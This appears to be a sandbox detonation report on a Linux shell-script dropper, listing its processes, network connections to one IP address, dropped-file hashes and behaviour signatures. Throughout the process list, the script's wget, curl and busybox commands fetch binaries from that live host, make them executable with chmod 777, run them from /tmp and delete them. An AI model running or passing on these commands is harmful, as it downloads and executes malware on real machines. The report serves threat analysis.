[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-24 01:07

Reported

2024-11-24 01:09

Platform

ubuntu1804-amd64-20240508-en

Max time kernel

28s

Max time network

129s

Command Line

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E N/A
N/A /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y N/A
N/A /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT N/A
N/A /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 N/A
N/A /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c N/A
N/A /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR N/A
N/A /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 N/A
N/A /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB N/A
N/A /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O N/A
N/A /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 N/A
N/A /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey N/A
N/A /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 N/A
N/A /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat N/A
N/A /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4 /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A
File opened for modification /tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y /usr/bin/curl N/A
File opened for modification /tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB /usr/bin/curl N/A
File opened for modification /tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy /usr/bin/curl N/A
File opened for modification /tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c /usr/bin/curl N/A
File opened for modification /tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0 /usr/bin/curl N/A
File opened for modification /tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5 /usr/bin/curl N/A
File opened for modification /tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5 /usr/bin/curl N/A
File opened for modification /tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR /usr/bin/curl N/A
File opened for modification /tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey /usr/bin/curl N/A
File opened for modification /tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E /usr/bin/curl N/A

Processes

/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh

[/tmp/d0825b48bf28e63aff59de6fc1435a10a0e1c09d3c6a677363f644feceb525ce.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/chmod

[chmod 777 wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/tmp/wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy

[./wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/bin/rm

[rm wXJFdpXJuaEFyrrqm7fgJi8cWMLoaMcijy]

/usr/bin/wget

[wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/chmod

[chmod 777 F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/tmp/F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4

[./F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/bin/rm

[rm F6QRmPx1bJ8meVCDnUDTeQmM4AnEsPAJH4]

/usr/bin/wget

[wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/chmod

[chmod 777 BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/tmp/BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat

[./BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/bin/rm

[rm BewxJ80b8Z0sWNfOvVrkimZxwdlyAtpQat]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/chmod

[chmod 777 KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/tmp/KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB

[./KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/bin/rm

[rm KUVkMsD5wG4j4z1Bx1Y5FQBxyo4EvCKTBB]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/tmp/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR

[./05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/rm

[rm 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/wget

[wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/chmod

[chmod 777 jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/tmp/jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5

[./jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/bin/rm

[rm jDTKQ8um0gYbQFShCsXMC5oLmPNTi4iiF5]

/usr/bin/wget

[wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/chmod

[chmod 777 nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/tmp/nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey

[./nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/bin/rm

[rm nuEVO1QegCoovHpY61ekJXJBAyFxmyuHey]

/usr/bin/wget

[wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/chmod

[chmod 777 qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/tmp/qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O

[./qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/bin/rm

[rm qtAWt3ffqmVAJReWltBuxMyvGR7BzvPw9O]

/usr/bin/wget

[wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/chmod

[chmod 777 pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/tmp/pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5

[./pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/bin/rm

[rm pfoXEv7S9cabglYvf9QktOtJq9zr7hEAs5]

/usr/bin/wget

[wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/chmod

[chmod 777 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/tmp/93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E

[./93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/bin/rm

[rm 93JQo5tpx9IxONU5tx3TmUNbMyN7DwV21E]

/usr/bin/wget

[wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/chmod

[chmod 777 iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/tmp/iQArRmyWEu9TrycExH8PaE1szm3DaBah0y

[./iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/bin/rm

[rm iQArRmyWEu9TrycExH8PaE1szm3DaBah0y]

/usr/bin/wget

[wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/chmod

[chmod 777 Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/tmp/Lo46YywIia327erXTugKxcchWtLwMJPGmT

[./Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/bin/rm

[rm Lo46YywIia327erXTugKxcchWtLwMJPGmT]

/usr/bin/wget

[wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/chmod

[chmod 777 TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/tmp/TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0

[./TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/bin/rm

[rm TOd8GxM5d6WZkJ4J2go9miNtLCG5mALWV0]

/usr/bin/wget

[wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/chmod

[chmod 777 vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/tmp/vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c

[./vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/bin/rm

[rm vib0DUNx3N9TmMKw41R3vT34M9k1LpCB6c]

/usr/bin/wget

[wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

/bin/chmod

[chmod 777 05g8tl5L6HfMYWfG7lPLQFA2SlSRHbQLbR]

